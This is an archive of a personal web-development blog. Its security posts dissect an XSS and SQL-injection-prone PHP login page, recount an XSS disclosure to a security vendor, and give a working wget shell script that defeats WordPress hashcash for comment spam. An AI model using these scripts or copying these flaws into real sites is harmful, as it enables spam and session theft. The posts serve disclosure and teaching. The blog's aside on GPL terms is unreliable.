Seth Woolley's Blog

Occasional Musings

graphviz vml output plugin(0)



Internet Explorer doesn't support SVG, but every browser does.

Graphviz has an SVG output driver, but nothing for IE.


Internet Explorer supports VML, but no other browser does.

Implement a VML output plugin for Graphviz.


Now we get antialiased lines in any browser with graphviz!

Seth Woolley's Blog webdevel



I'll add things I observe here:

Fixed bugs I've noticed

  • My manual page viewer supports the sliding menu now with only one small change as noted below.

  • I think the > selector is now actually working on IE7.

Bugs I've noticed

  • to get display: block/none css menu stuff to work in IE7, you need to place the CSS (all instances, including an xml preprocessor stylesheet) _after_ the doctype so that it renders in standards-compliant mode.

  • the IE DOM Viewer seems cool, but it won't send refreshed data to validation services.

Seth Woolley's Blog webdevel

pure css menu hacks(0)

pure css menus

I've been working on some code to get CSS menus working in both IE and Firefox.  I stole an implementation from GRC and hacked it down to its fundamentals.  They used list items which required three times the code.  This is much better, IMO.

the xhtml

<div class="menu">
  <div class="key">Key</div>
  <div class="value">Value</div>

the css

.menu {
  position: relative; /* this is needed to get children to be relative to it */
  display: block;     /* not needed if using divs instead of spans /*
  height: 18px;       /* needed to have a reference for the top value below */
  width: 20em;        /* width of the menu */
  background: white;  /* not transparent! (could be same color as parents) */

.menu .value {
  position: absolute; /* this is needed to be placed relative to parent menu */
  display: none;      /* hide it by default first */
  top: 18px;          /* this is relative to the height of the menu container */
  left: 0px;          /* this is relative to the left of the menu container */
  width: 20em;        /* width of the drop down menu */
  background: white;  /* not transparent! (could be same color as parents) */

.menu:hover .value {
  display: block;     /* show it when we hover over the parent */

Seth Woolley's Blog webdevel

miniature font updated(0)


swoolley miniature fontsI updated my miniature fonts a while back but need to republish them, so here they are.

Five new versions

original small lowercase version
taller lowercase for readability
a double-size of swoolley2
a double-size of swoolley5
A serif'd version of swoolley2


Install the pcf.gz files into /usr/X11R6/lib/X11/fonts/misc/, run mkfontdir in that directory, then restart X (or run xset fp rehash). For fontconfig (which these sets now support), I had to change them from ascii encoding to iso-8859-1.  Run fc-cache instead of mkfontdir for fontconfig, of course.  For Windows, copy the .fon files into c:\Windows\fonts (or WinNT, depending on platform).

About was used to convert to bdf format, which is now the native format I use.  The pcf.gz files were compiled with 'bdftopcf | gzip -c'.  The fon files were generated with bdf2fnt.exe -c swoolley.bdf swoolley.fon.

The image represents swoolley, swoolley2, and swoolley5, in order, printable characters 21-7E (in hexadecimal), or the full ascii range, not the full iso-8859-1 range.

Seth Woolley's Blog webdevel

anatomy of a typical XSS problem with user logins and cookies(0)


Repeatedly, I see the same stupid login/authentication cross-site scripting mistake, over and over again, so I thought I'd tell everybody about it to try and remind people what not to do.



Check out the pmos help desk, here:

Looks normal.  Only a couple fields to enter data into, right?  Not quite, there's a variable that we don't see right away.

Click on a link in the header that looks like it might require authentication, say, tbe "Browse" link, like this:

The php is so smart it knows you haven't logged in yet.  So what does it do?  It gets smart -- it says, hey, I need you to login.  So I'm going to send you to the login page.  BUT, as an added convenience, I'm going to tell the login page to send you back at the end like this:

Isn't that nifty.  Yes and no.  Yes, it's nifty in that it's a cool design improvement, but no it's not in that it's another form of input into the system, one that isn't so carefully guarded because it'll never hit the SQL system.

An unsanitary problem

Let's download their source code and take a look at how they implemented it.  I just went to: and clicked and opened up login.php.  (Ignore their statement, "Also, please read the GPL license thoroughly. By no means can you use this code (or any of it) in your own product and sell it as your own -- that is completely illegal and will be prosecuted."  -- This is false.  The GPL lets you charge whatever you want for a product so long as you give them credit in the source files/changelog.)

<form action="<?php echo $HD_CURPAGE ?>" method="post">
  <input type="hidden" name="cmd" value="login" />
  <input type="hidden" name="redirect" value="<?php echo ($_GET[redirect] != "" ) ? $_GET[redirect] : $_POST[redirect]; ?>">
  <tr><td><label for="email">Email: </td><td><input type="text" name="email" size="30" value="<?= $_POST[email] ?>" /></label></td></tr>
 <tr><td><label for="password">Password: </td><td><input type="password" name="password" size="30" /></label></td></tr>
 <tr><td><br /><input type="submit" value="Login" /></td></tr>

Ouch!  No sanitation, whatsoever.  They let you do pretty much whatever you want before you login (this is not so dangerous).  But first, let's note the first problem in this code:

(Note that the email input field is also XSSable (but via the POST method).

It just puts that directly into the hidden field for the redirect, without sanitation -- classic XSS, but not so big a deal -- if you're on the login page your cookies probably aren't there to steal yet, if you have well-implemented session-only cookies -- which they don't (they just let them live for a whole month):

setcookie( "iv_helpdesk_login", $_POST[email], time( ) + 2592000 );.


Delivering the payload

If you need to inject code where quotes aren't allowed (magic quotes are enabled, for example!), you can, for example, use the document.referer property and setup your own site to download two different sets of data, one intended for the client, another for the server, so that when the server sees it they get needed payload.

Here's a way that just decodes part of the url for the payload to avoid magic quotes altogether:

(Tricks like this are why javascript should die.)

It gets worse from here

if( trim( $_POST[redirect] ) != "" )
  $redirect = $_POST[redirect];
  $redirect = $HD_URL_BROWSE;

$EXTRA_HEADER = "<meta http-equiv=\"refresh\" content=\"1; URL={$redirect}\" />";
$msg = "<div class=\"successbox\">Login successful.  Redirecting you now.  Click <a href=\"{$redirect}\">here</a> if you aren't automatically forwarded...</div>";

$do_redirect = 1;

Yep, they let you inject code _after_ login has succeeded, so if you want to make sure you get their auth data, just... let them login first before activating your payload (which you could carry over via document.referrer instead of document.location if it's not an encrypted link)!

Note that, magic quotes _must_ be enabled for pmon to work.

Magic quotes and SQL

Futhermore, it's littered with magic-quotes-expecting SQL commands like:

$res = mysql_query( "SELECT * FROM {$pre}user WHERE ( email = '$_POST[email]' && password = '$_POST[password]' )" );



Yeah, stay away from the h2desk pmon code (no idea about their commercial offering though), as it's not a good example of quality, secure code.

Seth Woolley's Blog webdevel security



A couple weeks ago i received an email from the recruiter who saw my resume and invited me to interview at ScanAlert.  I emailed back and called the recruiter the next day to see what the position entailed.  It was for their "ethical hacker / penetration tester" position, which is still posted on their website.  I was curious so I thought I'd see what it's like there, having never worked in a "corporate" security environment, but instead for smaller businesses.  I talked to the Vice President of Engineering, Ben Tyler, and he offered a challenge on a fake website:

In our fictitious web site, one or more of the following
vulnerabilities may exist:

Cross Site Scripting
SQL Injection
Directory Listing
Path Disclosure

They wanted me to send an IP back to open up the url to me for 24 hours, but before I did that I was bothered by their apparent "find all the vulnerabilities and slap a sticker declaring it safe" mentality, so I took a look at their own website and in a few minutes happened upon an interesting XSS vulnerability that let me inject html attributes into a link.'hi');


I replied back with the following:

Hi Ben,

In reaction to your challenge to break into a fictitious website, I
must challenge you to secure your own website:

<XSS exploit url here>

When your recruiter contacted me for a position as a Professional /
Ethical Hacker / Penetration Tester, I was curious about the idea of
being employed by scanalert, however, I have had some doubts when you
said "find the vulnerabilities".  The use of a definite article led me
to believe that there might be a culture of "finding all the
vulnerabilties" in websites, declaring them secure, and then slapping
stickers on them.  There is no question as to the value of security
auditing, but it is just that, an audit, not a guarantee.  Questioning
the efficacy of such a culture, I decided to test its value by checking
your website for basic vulnerabilities.  In a matter of minutes I
discovered the above vulnerability.  The "Hacker Safe" concept should be
thought of as "Hacker Safer".

Now, I do acknowledge that perhaps I read too much into your wording
and that indeed, a culture of progressive security may yet exist at
scanalert, so I'm still interested in pursuing this position, but I need
some reassurance that a culture of asymptotic security thrives at
scanalert, that the Hacker Safe logo really means, internally,
Hacker Safer, and that I too will be able to gain progressive experience
in novel and interesting security techniques while employed at



No reply came back, but five days later, I noticed they fixed it, but poorly.  The following link still worked:'hi');

For a security website, I was disappointed that they couldn't fix the entire vulnerability, so I looked around for a few more vulns and sent them a more detailed report listing more things things they probably wouldn't want their code to be doing, including an information leakage vulnerability and how their login form works well with XSS vulns to promote privileges automatically.

They still haven't completely fixed the vulnerability, despite it being five days later, again, so I'm publishing this blog entry to expose their inability to manage their own security.

Seth Woolley's Blog webdevel reallife security exploitable too(0)


When will they ever learn?


as always if they read their own manual page...

Update: I looked again into this site to try to craft a vulnerability report:


And their isquestionable string is not the same as the one included on the cpan website, yet the modified date is back in '97.  They are using the latest version of man2html though, 3.0.1.

Perhaps man.cgi has been updated and many bad man.cgi copies are still floating around, or the source code was fixed without changing the modified date in the tarball.

This is an odd development.  It seems every site I run into running this code is flawed -- why would there be so many flawed sites created after the last modified date?

Seth Woolley's Blog webdevel security

miniature font(0)


swoolley miniature font This font I made is demonstrated:


I drew it with: to convert to bdf format from the image I created.


compiled (with bdftopcf | gzip -c):


install into /usr/X11R6/lib/X11/fonts/misc/, run mkfontdir in that directory, then restart X.

Seth Woolley's Blog webdevel

XSS not a security problem?(0)


Slashdot carried a link to an armchair security "institution" (Why make up a corny name for yourself, call it your company blog and expect kudos? Just blog under your own name!) that makes this claim:

"It is *of the utmost importance* to note that a page that has an XSS vulnerablity is no /more dangerous/ than visiting a random result generated by a Google search - something that users do all the time."

This is quite false.  He correctly identifies the first problem: social engineering an XSS url may provide (although why he doesn't consider this "more dangerous" is beyond me), however he misses the second problem, that since the XSS is on the actual host, the javascript can run in a state of elevated privileges for cookie access to that site.  This lets you steal any of their cookies simply.

His article is thus flagrantly ignorant, and it should simply be ignored.  Everybody in the know already agrees that JavaScript is a gaping security hole and people shouldn't be running with it all the time.  While he does credit to those trying to get JavaScript eliminated from the web, he discredits them by misleading the XSS's risk as a twisted argument to elevate the problems with JavaScript.

One might argue that it only strengthens his point that JavaScript sucks because it is the very thing that enables the problem with cookies and XSS.  However, he should have simply argued _that_ and improved his case.  Now his title is simply too false to have a lasting impact, despite the good merits of his goal.

Seth Woolley's Blog webdevel security

mozilla finally fixes security issue(0)


I reported this security issue three years ago:


Looks like they decided it was time to fix it after getting a duplicate report from somebody at Stanford.

Thanks Mozilla!

Seth Woolley's Blog webdevel security

another man viewer dumb(0)


Read the paragraph that reads:

        However,  if  name  contains  a slash (/) then man
interprets it as a file specification, so that you can  do
man ./foo.5 or even man /cd/foo/bar.1.gz.


Looks like there was an attempt to sanitize cgi_section but not cgi_command -- also looks like it was hacked a bit and the sanitation may have been there, but removed later.

Seth Woolley's Blog webdevel security

AJAX to Balkanize the web(0)


I've written on AJAX previously, so you are aware of my stance on AJAX, but my fears of balkanization are coming to fruition.

Take for example, Gates' recent memos on Web 2.0.  Microsoft is finally deciding that they can not only leverage their use of a web browser throughout their own products on a client workstation install, but they can turn Microsoft Office into a web service.

Why is this significant?  Because before AJAX, there was literally no reason to enable javascript in a browser.  Now software providers are finding more and more ways to make it a requirement.  Instead of thin services relying upon the basic CGI process, we'll have thick (in terms of bandwidth) services that will be ever so uselessly interactive.  Bandwidth requirements go up, computing power needs on the client go up, more Intel Processors ship, the ISPs justify running more and more bandwidth to homes, thick xml-based protocols promulgate, and all the corporations are happy.

Why is this bad for us?

First, it's bad because the developing world is not going to catch up to the system requirements any time soon.  The developing world is thus not able to afford the thick clients and pipes needed for an AJAX-based Web 2.0.

Second, As more and more services are required to be download-based, asymmetry continues to develop in the ISP's motivation to deliver bandwidth to end users.  Upload prices will remain high as they reap large rewards from corporations that desire to be in on the Web 2.0 world that they develop.  Download bandwidth prices drop, but the only parties able to deliver the content will be corporations.

Thus the Web 2.0, far from being the democratic medium it was supposed to be, becomes fractured by ever-growing bandwidth and clock cycle differentiation.  Peer-to-peer systems and other democratic forms of communication become more and more unfeasable as the asymmetry between download and upload speed continues to grow.  Web 2.0 becomes more broadcast-based and less peer-to-peer.  Democracy flounders.

So, how do we combat this?  Well, I have a few ides.  Content providers who care can pursue the following policies:

First, they should continue to provide standards-compliant and accessibility-driven websites that follow core protocols and ignore implementing core utility features in javascript.  The semantic web is not a javascript world.  The W3C, the IETF, nor any working group of the Internet Society did not standardize ECMAscript/javascript.  ECMA did.  ECMA is essentially clueless on policy decisions.

Second, instead of making crazy, proprietary thick-clients that only use part of the standards stack, we should continue to stick to W3C-based protocols such as XHTML, CSS, and XSTL.  I believe the free software community has done a pretty good job with this, especially in regard to open documentation and document formats.

Third, instead of promulgating arbitrary XML schemas, we need to ensure that the XML schemas are well-documented.  Microsoft, for example releases completely undocumented XML schemas.  Some free software projects also have a problem with this, in that they are all documented in implementation, but they have no formal documentation that third party developers can use to develop against while expecting stability.

Fourth, if you have to use AJAX, make sure that it's got a very good reason, that it is accessibility-friendly, and that it's well-documented such that people can easily write accessible interfaces to the XML to present it using ones own scripts.

By following some simple guidelines (more are welcome), we can make sure Web 2.0 doesn't Balkanize the Internet into the content-providers and content-consumers, undemocratically.  Why will we prevail?  Because the very existince of these alternatives allows the continued interconnectedness of under-interconnected populaces.  With an alternative system provided, people will have a choice of participating in either system freely, and once the infrastructure is in place, created by free software and the cooperation of developing countries' governments to fund cheap, mass hardware deployments (hopefully enabled by the rejection of foreign patents) the content classes can create their private networks without risking the destruction of the public commons already created.

That still leaves only one major trick we have to perform: the democratization of ideas through the rejection of software and trivial hardware patents.  Software patents and absurd hardware patent enforcement will eliminate all the rosiness of my outlook and allow the content producers to monopolize, through a government-enforced monopoly, all the technologies that would have allowed the democracy of ideas to flourish.

Seth Woolley's Blog politics webdevel

wordpress hashcash broken(0)


As a proof of concept, I wrote a shell script to break hashcash.  It works on the author's own blog:

CPID="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep 'comment_post_ID' | cut -d'"' -f 14)"
MD5="$(wget -O - "$SITE$POST" 2>/dev/null |
          grep '<form onsubmit' | cut -d"'" -f2 |
          tr -d '\n' | md5sum | cut -d' ' -f1)"
for i in 34; do  # here just change 34 to a list of guesses of what
                 # the length of ABSPATH is, 34 in this example
  wget --post-data="author=$AUTHOR&email=$EMAIL&url=$URL&comment=$COMMENT&submit=Submit+Comment&comment_post_ID=$CPID&$MD5=$(($CPID * $i))" $SITE/wp-comments-post.php

He uses javascript "obfuscation" to make it hard for people to find his installs.  Just look for this string, which isn't obfuscated on any install:

(str){var bin=Array();var mask=(1<<8)-1;for(var i=0;i<str.length*8;i+=8)bin[i>>5]|=(str.charCodeAt(i/8)&mask)<<(i%32);return bin;}

or just do this: ;)

Elliot Back thinks people can't code around his obfuscation.  It's rather trivial to defeat -- and this script can spam his site one after another with a little addition or two -- determining the length of ABSPATH for a single site doesn't take that long either, and once you have it, it's the same for all posts.  He appears to does some fancy stuff, too "per-user", but a spammer isn't going to be "a user" or bother to become one.

Of course, you can just "interpret" his javascript, too, like some spammers already can do, but that can be more effort than it's worth.

Seth Woolley's Blog webdevel security

AJAX utility and Ruby On Rails(0)


I've been reading a bit about Ruby On Rails ( ), and the hype surrounding it -- and I think for a minimalist such as myself it is intriguing.  First, I've always abhored Javascript because it's like letting an untrusted user run almost arbitrary code in your machine's security context.  Of course sandboxes are an attempt to mitigate that, but the risk of simulating the presentation too well is always at hand.  So while Ruby On Rails seems interesting, I'm not sure how much I'd like it.

Yes, Ruby appears to be a language that's taken a lot of input from the Python and Perl (and LISP and PHP, et cetera) communities and done the Right Thing most steps of the way, and it's the next language I want to spend a lot of time with, but this integrated JavaScript thing -- I'm just left with mixed feelings.  Pehaps if it were done in Python I could keep myself untainted by both ugly concepts, but this is Ruby, and I have to consider it.

That said, I've considered it, and I can see a place for AJAX given such nice apps as, but when I have a text browser up, I really just need to get work done, and the more AJAX, the more I fear the web will Balkanize into AJAX-graphical-manipulation worlds and the rest of the world, where text browsers are useful.  My philosophy thus, as it always has been, is to keep JavaScript out of the required interface elements and into a time-added-interface for those who don't grok text-based interfaces so well.  I always find, instead that text-based interfaces are simply faster than graphical interfaces in most cases.  True, I won't part with my mouse just yet, and it has its place, but I think 99% of the time, I really just want to use my Vulcan Mind Meld into my keyboard for interfacing into my computer.

Seth Woolley's Blog webdevel

TrackBack and PingBack revisited(0)


A short while after TrackBack and PingBack were introduced, I wrote a blog entitled "The Problems with TrackBack and PingBack" where I laid out that both were a completely useless addition to the web and only worked to increase security risks by adding a plethora of complex code additions.

It turns out that I was correct.\

Rather than repeating what I wrote that has since been lost to a harddrive crash, I found a good summary of what to do instead here:

I wish I had a copy of what I wrote, as it predates that entry by six months, but that will have to suffice.

So in summary, please, disable trackback and pingback and use the existing methods we already have.

For clarification, the existing methods are:

  • for comment-aggregation, use a blog that allows comments to be edited by the user.  A "feature" of trackback is the "remote comment".  Post a link to the comment in your blog, or post a link to the remote blog of the link back to your comment.  This prevents unneeded duplication as well.
  • for link-aggregation, use a referrer analyzer that validates the legitimacy of referrers.

Seth Woolley's Blog webdevel security